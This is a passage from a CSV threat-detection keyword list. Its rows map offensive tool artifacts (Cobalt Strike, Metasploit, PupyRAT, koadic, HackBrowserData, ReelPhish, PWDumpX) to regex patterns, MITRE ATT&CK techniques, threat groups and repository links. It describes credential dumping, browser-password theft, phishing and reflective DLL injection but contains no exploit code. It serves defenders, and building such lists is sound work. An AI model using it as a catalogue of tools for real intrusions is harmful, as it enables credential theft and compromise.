scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","#logfile","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","56596" "*reedarvin@gmail.com*",".{0,1000}reedarvin\@gmail\.com.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#email","N/A","10","8","N/A","N/A","N/A","N/A","56597" "*ReelPhish*",".{0,1000}ReelPhish.{0,1000}","offensive_tool_keyword","ReelPhish","ReelPhish consists of two components: the phishing site handling code and this script. The phishing site can be designed as desired. Sample PHP code is provided in /examplesitecode. The sample code will take a username and password from an HTTP POST request and transmit it to the phishing script. The phishing script listens on a local port and awaits a packet of credentials. Once credentials are received. the phishing script will open a new web browser instance and navigate to the desired URL (the actual site where you will be entering a user's credentials). Credentials will be submitted by the web browser","T1566 - T1114 - T1071 - T1547 - T1546","TA0001 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/fireeye/ReelPhish","1","0","N/A","N/A","N/A","6","514","153","2023-08-11T01:40:07Z","2018-02-01T20:35:11Z","56598" "*reflct_dll_inject.exe*",".{0,1000}reflct_dll_inject\.exe.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted Windows binary from inside memory without a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","56600" "*reflective_assembly_minified.ps1*",".{0,1000}reflective_assembly_minified\.ps1.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github 
repo","10","","N/A","","","","56601" "*reflective_dll.dll*",".{0,1000}reflective_dll\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","56602" "*reflective_dll.dll*",".{0,1000}reflective_dll\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56603" "*reflective_dll.x64.dll*",".{0,1000}reflective_dll\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","56604" "*reflective_dll.x64.dll*",".{0,1000}reflective_dll\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56605" "*reflective_dll_inject*",".{0,1000}reflective_dll_inject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56606" "*reflective_pe_loader.*",".{0,1000}reflective_pe_loader\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56607" "*ReflectiveDll.*",".{0,1000}ReflectiveDll\..{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","56608" "*ReflectiveDll.x64.dll*",".{0,1000}ReflectiveDll\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","56609" "*ReflectiveDll.x86.dll*",".{0,1000}ReflectiveDll\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - 
Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","56610" "*ReflectiveDLLInjection*",".{0,1000}ReflectiveDLLInjection.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56611" "*ReflectiveDLLInjection.*",".{0,1000}ReflectiveDLLInjection\..{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","56612" "*ReflectiveDLLInjection.*",".{0,1000}ReflectiveDLLInjection\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","56613" "*ReflectiveDLLInjection.*",".{0,1000}ReflectiveDLLInjection\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56614" "*ReflectiveDllInjection.*",".{0,1000}ReflectiveDllInjection\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","56615" "*ReflectiveDLLInjection.h*",".{0,1000}ReflectiveDLLInjection\.h.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","56616" 
"*ReflectiveDLLInjection/dll*",".{0,1000}ReflectiveDLLInjection\/dll.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","56617" "*Reflective-HackBrowserData*",".{0,1000}Reflective\-HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","56618" "*Reflective-HackBrowserData*",".{0,1000}Reflective\-HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tool","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","56619" "*ReflectiveLoader.*",".{0,1000}ReflectiveLoader\..{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","56620" "*ReflectiveLoader.c*",".{0,1000}ReflectiveLoader\.c.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56621" "*ReflectiveLoader.c*",".{0,1000}ReflectiveLoader\.c.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","56622" "*ReflectiveLoader.cpp*",".{0,1000}ReflectiveLoader\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","56623" 
"*ReflectiveLoader.cpp*",".{0,1000}ReflectiveLoader\.cpp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56624" "*ReflectiveLoader.h*",".{0,1000}ReflectiveLoader\.h.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 
